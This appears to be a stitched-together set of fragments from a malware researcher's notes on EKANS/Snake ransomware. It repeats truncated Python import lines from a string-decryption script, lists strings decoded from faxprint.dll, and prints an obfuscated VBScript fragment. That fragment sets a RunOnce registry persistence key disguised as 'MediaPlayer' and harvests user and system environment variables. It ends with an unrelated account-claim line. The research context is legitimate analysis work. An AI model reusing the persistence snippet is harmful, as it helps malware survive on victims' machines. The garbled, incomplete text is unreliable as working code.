Tweaked script:
import re
import sys
import pefile
import struct
import binascii
Tweaked script:
import re
import sys
import pefile
import struct
import binascii
$ strings -e l faxprint.dll | |
GGMM | |
exit | |
%s%s\ | |
Kernel32.dll | |
May 9 2020 | |
%d*%d | |
%dd%dh%dm%ds | |
T:%dM,A:%dM | |
~MHz |
Strings decoded from the newer version of #EKANS ransomware.
import re
import sys
import pefile
import struct
import binascii
On Error Resume Next
Set bhBxz = WScript.CreateObject("WScript.Shell")
NgWJtK = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\MediaPlayer"
Set VFUSKXwNgG = CreateObject("WScript.Shell")
Set ioBuA = CreateObject("Scripting.FileSystemObject")
ARtLeH = VFUSKXwNgG.ExpandEnvironmentStrings("%USERPROFILE%")
GOfuTtmrFM=VFUSKXwNgG.ExpandEnvironmentStrings("%COMPUTERNAME%")
tAqdq=VFUSKXwNgG.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
IVcetC=VFUSKXwNgG.ExpandEnvironmentStrings("%APPDATA%")
Script and the decoded strings from the EKANS/Snake ransomware. Original script written by @sysopfb - I've only modified the regexp to cover all cases where decryption was used in the sample.
Script:
import re
import sys
import pefile
import struct
I hereby claim:
To claim this, I am signing this object: